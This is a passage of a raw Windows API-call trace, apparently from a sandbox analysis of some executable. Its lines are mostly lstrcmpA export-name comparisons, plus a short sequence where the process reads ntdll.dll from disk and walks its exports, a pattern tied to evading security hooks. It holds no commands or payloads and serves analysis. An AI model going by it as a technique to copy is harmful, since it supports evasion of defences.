1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0085.821] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0085.821] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0085.821] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.821] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.821] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0085.821] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0085.821] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0085.822] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0086.019] GetProcessHeap () returned 0x570000 [0086.019] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4171040 | out: hHeap=0x570000) returned 1 [0086.026] GetProcessHeap () returned 0x570000 [0086.026] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589120 [0086.026] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0086.026] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0086.026] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0086.026] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0086.026] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0086.027] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0086.027] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0086.027] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0086.027] GetProcessHeap () returned 0x570000 [0086.027] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1bba48) returned 0x4179040 [0086.071] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0086.071] ReadFile (in: hFile=0x140, lpBuffer=0x4179040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4179040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0086.229] CloseHandle (hObject=0x140) returned 1 [0086.229] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0086.229] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0086.229] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0086.229] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0086.229] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0086.229] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0086.229] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0086.229] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0086.229] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0086.229] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0086.229] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0086.230] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0086.230] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0086.230] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.230] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0086.230] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.230] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0086.231] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0086.231] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0086.240] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.241] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.241] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0086.241] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.242] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.242] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.242] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0086.242] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0086.243] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0086.243] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0086.243] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0086.243] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0086.244] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0086.245] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", 